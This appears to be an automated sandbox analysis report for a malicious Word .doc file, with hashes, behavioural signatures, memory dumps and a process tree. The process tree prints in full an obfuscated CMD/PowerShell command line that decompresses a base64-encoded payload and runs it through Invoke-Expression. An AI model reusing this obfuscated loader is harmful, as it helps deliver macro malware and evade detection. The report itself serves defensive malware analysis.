Analysis

  • max time kernel
    49s
  • max time network
    73s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-en-20220113
  • submitted
    01-02-2022 03:08

General

  • Target

    e75b2858a88962cfb7818a6908ad01a9682b0074e5f996cede0f59c8a83a3908.doc

  • Size

    71KB

  • MD5

    451ba7b81467b1f901b347d94e0b8bd8

  • SHA1

    62b4acdf2515930af282ffac34e6e7e7bba8366c

  • SHA256

    e75b2858a88962cfb7818a6908ad01a9682b0074e5f996cede0f59c8a83a3908

  • SHA512

    1f1489718d4c28d29c7f6eae0a619cd28e84e745ba83b83b7269559e6625fa5c506930b7c9c8bb76b8030605f6f0ab589674d569bd9fc9573abe8958bafbd72a

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Drops file in Windows directory 2 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 41 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\e75b2858a88962cfb7818a6908ad01a9682b0074e5f996cede0f59c8a83a3908.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:452
    • C:\Windows\SYSTEM32\CMD.exe
      CMD c:\Windows\SySTEm32\cmd /C "SeT LdEbZ=^& ( $sheLLId[1]+$shelliD[13]+'X') (NEw-oBJEct IO.COmpREsSIoN.deFLaTeSTrEAM([io.MemorYsTrEaM] [CoNVerT]::fROMBASE64STRiNG( 'TZBNa8JAEIb/Sg6BVaybi7bUEEhbK3iwpZZaD71sNhMyurtZNhPjB/53N7ZQLwMz88zDy4Q77RID7bDKNiApeAPi35C9KARDcfis3hNWEtlJFLVtywsEJ3JQSuimRik4UjRapX8EFIVq9hpyFFxWOqplenOrhSwbi9JXB7a+Eg9qvLL235A5UaMCdGhKkYFo6NBxPHPRx7IZvS6e4FYpcqq1cFSDbBz+stFyOkNcHyTjn1Yh9VjK+nFYfK2DJGCP43vmm+MiCcHsJgTaDtgPG3T7AeOwBxYXlQOftRdujiJAE3Rf6J/IHU6h/xafVq1RlchnPuiVuQs6YT+em121heHcS6+TOPOebXyWgmR5Op8v' ) ,[systEM.IO.cOmPRESsion.cOMpressIONMOdE]::DEcomPREss) ^| % { NEw-oBJEct iO.sTReaMReAdER($_,[TEXt.ENCOdIng]::aScIi) } ).reaDToEnD( )&& POwERshELl . (\"{0}{2}{1}\"-f'sE','IteM','T-' ) ( 'vaRIable:9' + 'BUwS' + 'n' ) ( [tYPE]( \"{2}{3}{0}{1}\" -F'RONMe','nT','Env','i')) ; ( ( ^&( 'Ls' ) ( 'vAriAbLe:9' +'BuWS' + 'n' ) ).\"VA`lUe\"::(\"{3}{0}{1}{6}{4}{2}{5}\"-f'iRO','N','riAb','GetenV','a','le','menTV').Invoke( ( \"{1}{0}\" -f'ebZ','ld'),(\"{2}{0}{1}\"-f 'S','s','pRoCe') ) ) ^| ^&( \"{1}{0}{3}{2}\" -f 'nVoKE','I','ESsiOn','-EXpR')"
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:4072
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        POwERshELl . (\"{0}{2}{1}\"-f'sE','IteM','T-' ) ( 'vaRIable:9' + 'BUwS' + 'n' ) ( [tYPE]( \"{2}{3}{0}{1}\" -F'RONMe','nT','Env','i')) ; ( ( &( 'Ls' ) ( 'vAriAbLe:9' +'BuWS' + 'n' ) ).\"VA`lUe\"::(\"{3}{0}{1}{6}{4}{2}{5}\"-f'iRO','N','riAb','GetenV','a','le','menTV').Invoke( ( \"{1}{0}\" -f'ebZ','ld'),(\"{2}{0}{1}\"-f 'S','s','pRoCe') ) ) | &( \"{1}{0}{3}{2}\" -f 'nVoKE','I','ESsiOn','-EXpR')
        3⤵
          PID:260
    • C:\Windows\System32\WaaSMedicAgent.exe
      C:\Windows\System32\WaaSMedicAgent.exe f3d853be3003e9d0ee726c27df49fc00 kshHHQPeHki0zmOrj22tlA.0.1.0.0.0
      1⤵
      • Modifies data under HKEY_USERS
      PID:3496
    • C:\Windows\system32\svchost.exe
      C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
      1⤵
      • Drops file in Windows directory
      • Suspicious use of AdjustPrivilegeToken
      PID:3780

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/452-130-0x00007FFBD6210000-0x00007FFBD6220000-memory.dmp

      Filesize

      64KB

    • memory/452-131-0x00007FFBD6210000-0x00007FFBD6220000-memory.dmp

      Filesize

      64KB

    • memory/452-132-0x00007FFBD6210000-0x00007FFBD6220000-memory.dmp

      Filesize

      64KB

    • memory/452-133-0x00007FFBD6210000-0x00007FFBD6220000-memory.dmp

      Filesize

      64KB

    • memory/452-134-0x00007FFBD6210000-0x00007FFBD6220000-memory.dmp

      Filesize

      64KB

    • memory/452-135-0x00007FFBD38E0000-0x00007FFBD38F0000-memory.dmp

      Filesize

      64KB

    • memory/452-136-0x00007FFBD38E0000-0x00007FFBD38F0000-memory.dmp

      Filesize

      64KB

    • memory/3780-137-0x000002537C960000-0x000002537C970000-memory.dmp

      Filesize

      64KB